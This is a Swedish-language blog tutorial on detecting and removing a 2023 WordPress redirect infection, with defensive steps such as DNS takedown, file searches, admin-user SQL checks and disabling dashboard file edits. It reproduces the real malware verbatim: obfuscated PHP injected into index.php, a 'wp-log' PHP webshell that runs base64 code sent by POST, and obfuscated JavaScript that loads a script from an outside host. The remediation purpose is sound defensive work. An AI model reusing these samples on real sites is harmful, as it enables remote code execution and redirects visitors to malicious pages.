Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress det är definitivt den mest använda plattformen CMS (Content Management System) för både bloggar och nybörjarwebbbutiker (med modulen WooCommerce), vilket gör den till den mest riktade av dataangrepp (hacking). En av de mest använda hackningsoperationerna syftar till att omdirigera den komprometterade webbplatsen till andra webbsidor. Redirect WordPress Hack 2023 är en relativt ny skadlig programvara som har effekten att omdirigera hela webbplatsen till spam-webbsidor eller som i sin tur kan infektera användarnas datorer.

Om din webbplats utvecklades på WordPress omdirigeras till en annan sida, då är det troligtvis offer för det redan kända omdirigeringshacket.

I den här handledningen hittar du nödvändig information och användbara tips genom vilka du kan avvirusa en webbplats som är infekterad med en omdirigering WordPress Hack (Virus Redirect). Genom kommentarerna kan du få ytterligare information eller be om hjälp.

Detektering av viruset som omdirigerar webbplatserna WordPress

En plötslig och omotiverad minskning av webbplatstrafiken, en minskning av antalet beställningar (när det gäller nätbutiker) eller i annonsintäkter är de första tecknen på att något är fel. Upptäcker"Redirect WordPress Hack 2023” (Virusomdirigering) kan också göras ”visuellt” när du öppnar webbplatsen och du omdirigeras till en annan webbsida.

Av erfarenhet är det mesta av skadlig programvara på webben kompatibla med webbläsare: Chrome, Firefox, Edge, Opera. Om du är datoranvändare Mac, dessa virus är inte riktigt synliga i webbläsaren Safari. Säkerhetssystem från Safari blockera tyst dessa skadliga skript.

Vad du ska göra om du har en webbplats infekterad med Redirect WordPress Hack

Jag hoppas att det första steget inte är att få panik eller ta bort webbplatsen. Inte ens infekterade filer eller virusfiler bör först tas bort. De innehåller värdefull information som kan hjälpa dig att förstå var säkerhetsintrånget finns och vad som påverkade viruset. Modus operandi.

Stäng webbplatsen för allmänheten.

Hur stänger man en viruswebbplats för besökare? Det enklaste är att använda DNS-hanteraren och ta bort IP:n för "A" (domännamnet) eller definiera en obefintlig IP. Således kommer webbplatsbesökare att skyddas från denna omdirigering WordPress hack som kan leda dem till virus- eller SPAM-webbsidor.

Om du använder CloudFlare som DNS-hanterare loggar du in på kontot och raderar DNS-posterna "A” för domännamnet. Således kommer domänen som påverkas av viruset att förbli utan en IP och inte längre kunna nås från Internet.

Du kopierar webbsidans IP och "dirigerar" den så att bara du kan komma åt den. Från din dator.

Hur man ändrar den verkliga IP-adressen för en webbplats på datorer Windows?

Metoden används ofta för att blockera åtkomst till vissa webbplatser genom att redigera "hosts"-filen.

1. Du öppnar Notepad eller en annan textredigerare (med administratörsrättigheter) och redigera filen "hosts". Det ligger i:

C:\Windows\System32\drivers\etc\hosts

2. I "hosts"-filen lägger du till "route" till den verkliga IP-adressen för din webbplats. IP raderad ovan från DNS-hanteraren.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Spara filen och gå till webbplatsen i webbläsaren.

Om webbplatsen inte öppnas och du inte har gjort något fel i "hosts"-filen är det med största sannolikhet en DNS-cache.

För att rensa DNS-cachen på ett operativsystem Windows, öppen Command Prompt, där du kör kommandot:

ipconfig /flushdns

Hur man ändrar den verkliga IP-adressen för en webbplats på datorer Mac / MacBok?

För datoranvändare Mac det är något enklare att ändra den verkliga IP-adressen för en webbplats.

1. Öppna verktyget Terminal.

2. Kör kommandoraden (kräver systemlösenord för att köra):

sudo nano /etc/hosts

3. Samma som för datorer Windows, lägg till domänens riktiga IP.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Spara ändringarna. Ctrl+X (y).

Efter att du har "dirigerat" är du den enda personen som kan komma åt den infekterade webbplatsen med Redirect WordPress Hack.

Fullständig säkerhetskopiering av webbplats – Filer och databas

Även om den är infekterad med "redirect WordPress hack", är rekommendationen att göra en generell säkerhetskopia av hela webbplatsen. Filer och databas. Eventuellt kan du också spara en lokal kopia av båda filerna från public / public_html samt databasen.

Identifiering av infekterade filer och de som ändrats av Redirect WordPress Hack 2023

De huvudsakliga målfilerna för WordPress det finns index.php (i roten), header.php, index.php şi footer.php av temat WordPress tillgångar. Kontrollera dessa filer manuellt och identifiera skadlig kod eller ett skadligt skript.

År 2023, ett virus av "Redirect WordPress Hack” lägga in index.php en kod av formuläret:

(Jag rekommenderar inte att du kör dessa koder!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Avkodad, det här skadligt skript det är i grunden konsekvensen av att webbplatsen är infekterad WordPress. Det är inte skriptet bakom skadlig programvara, det är skriptet som gör det möjligt att omdirigera den infekterade webbsidan. Om vi ​​avkodar skriptet ovan får vi:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Fix Redirect WordPress Hack 2023
Fix Redirect WordPress Hack 2023

För att identifiera alla filer på servern som innehåller denna kod är det bra att ha åtkomst SSH till servern för att köra filkontroll och hantering av kommandorader Linux.

Relaterat: Hur man tar reda på om din blogg är infekterad eller inte, med hjälp Google Search . (WordPress Virus)

Nedan finns två kommandon som definitivt är användbara för att identifiera nyligen modifierade filer och filer som innehåller en viss kod (sträng).

Hur ser du på Linux PHP-filer har ändrats under de senaste 24 timmarna eller någon annan tidsram?

Ordning "find” är mycket enkel att använda och tillåter anpassning för att ställa in tidsperioden, sökvägen till sökningen och typen av filer.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

I utgången kommer du att få information om datum och tid då filen ändrades, skriv-/läs-/körrättigheterna (chmod) och vilken grupp/användare den tillhör.

Om du vill kontrollera fler dagar sedan, ändra värdet "-mtime -1" eller använd "-mmin -360” i minuter (6 timmar).

Hur söker man efter en kod (sträng) i PHP, Java-filer?

Kommandoraden "hitta" som låter dig snabbt hitta alla PHP- eller Java-filer som innehåller en viss kod är följande:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Kommandot kommer att söka och visa filerna .php şi .js som innehåller "uJjBRODYsU".

Med hjälp av de två kommandona ovan kommer du mycket enkelt att ta reda på vilka filer som nyligen har ändrats och vilka som innehåller skadlig kod.

Tar bort skadlig kod från modifierade filer utan att kompromissa med rätt kod. I mitt scenario placerades skadlig programvara innan den öppnades <head>.

När du kör det första "hitta"-kommandot är det mycket möjligt att upptäcka nya filer på servern som inte är dina WordPress inte heller satt där av dig. Filer som tillhör virustypen Redirect WordPress Hack.

I det scenario jag undersökte, filer av formen "wp-log-nOXdgD.php". Dessa är "spawn"-filer som också innehåller skadlig kod som används av viruset för omdirigering.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Syftet med filer av typen "wp-log-*” är att sprida omdirigeringshackviruset till andra webbplatser som finns på servern. Det är en skadlig kod av typen "webshell” sammansatt av en grundläggande avsnitt (där vissa krypterade variabler är definierade) och o utförande avsnitt genom vilken angriparen försöker ladda och köra en skadlig kod på systemet.

Om det finns en variabel POST som heter 'bh' och dess krypterade värde MD5 är lika med "8f1f964a4b4d8d1ac3f0386693d28d03", då visas skriptet för att skriva det krypterade innehållet base64 av en annan variabel som heter 'b3' i en temporär fil och försöker sedan inkludera denna temporära fil.

Om det finns en variabel POST eller GET som heter 'tick', kommer skriptet att svara med värdet MD5 av strängen"885".

För att identifiera alla filer på servern som innehåller denna kod, välj en sträng som är gemensam och kör sedan kommandot "find” (liknande den ovan). Ta bort alla filer som innehåller denna skadliga kod.

Säkerhetsfel utnyttjas av Redirect WordPress Hack

Troligtvis kommer detta omdirigeringsvirus via utnyttjande av administrationsanvändaren WordPress eller genom att identifiera en sårbart plugin som gör det möjligt att lägga till användare med administratörsbehörighet.

För de flesta webbplatser byggda på plattformen WordPress det är möjligt redigera tema- eller plugin-filerfrån administrationsgränssnittet (Dashboard). Således kan en illvillig person lägga till skadlig kod till temafilerna för att generera skripten som visas ovan.

Ett exempel på sådan skadlig kod är detta:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identifieras i temahuvudet WordPress, omedelbart efter att etiketten öppnats <head>.

Det är ganska svårt att tyda detta JavaScript, men det är uppenbart att det frågar efter en annan webbadress varifrån det med största sannolikhet hämtar andra skript för att skapa filerna "wp-log-*” som jag pratade om ovan.

Hitta och ta bort den här koden från alla filer PHP påverkade.

Såvitt jag kunde se var den här koden manuellt lagt till av en ny användare med administrativa rättigheter.

Så för att förhindra tillägg av skadlig programvara från instrumentpanelen är det bäst att inaktivera alternativet att redigera WordPress Teman / plugins från instrumentpanelen.

Redigera filen wp-config.php och lägg till raderna:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Efter att ha gjort denna ändring, ingen användare WordPress du kommer inte längre att kunna redigera filer från instrumentpanelen.

Kontrollera användare med roll Administrator

Nedan finns en SQL-fråga som du kan använda för att söka efter administratörsanvändare på plattformen WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Denna fråga returnerar alla användare i tabellen wp_users vem som tilldelade administratörsrollen. Frågan görs även för tabellen wp_usermeta att söka i meta 'wp_capabilities', som innehåller information om användarroller.

En annan metod är att identifiera dem från: Dashboard → Users → All Users → Administrator. Det finns dock metoder som gör att en användare kan döljas i instrumentpanelen. Så det bästa sättet att se användare "Administrator"I WordPress är SQL-kommandot ovan.

I mitt fall identifierade jag i databasen användaren med namnet "wp-import-user". Ganska suggestivt.

WP Malware Dålig användare
WP Malware Dålig användare

Även härifrån kan du se datum och tid när användaren WordPress skapades. Användar-ID är också mycket viktigt eftersom det söker i serverloggarna. På så sätt kan du se all aktivitet för denna användare.

Ta bort användare med administratörsroll vilket du inte vet alltså ändra lösenord till alla administrativa användare. Redaktör, författare, Administrator.

Ändra lösenordet för SQL-databasanvändaren av den berörda webbplatsen.

Efter att ha tagit dessa steg kan webbplatsen startas om för alla användare.

Tänk dock på att det jag presenterade ovan är ett av kanske tusentals scenarier där en webbplats är infekterad med Redirect WordPress Hack under 2023.

Om din webbplats har blivit infekterad och du behöver hjälp eller om du har några frågor är kommentarsektionen öppen.

Brinner för teknik, skriver jag med glädje på StealthSettings.com sedan 2006. Jag har lång erfarenhet av operativsystem: macOS, Windows şi Linux, men också i programmeringsspråk och bloggplattformar (WordPress) och för nätbutiker (WooCommerce, Magento, PrestaShop).

Hur man » WordPress » Fix Redirect WordPress Hack 2023 (Virus Redirect)
Lämna en kommentar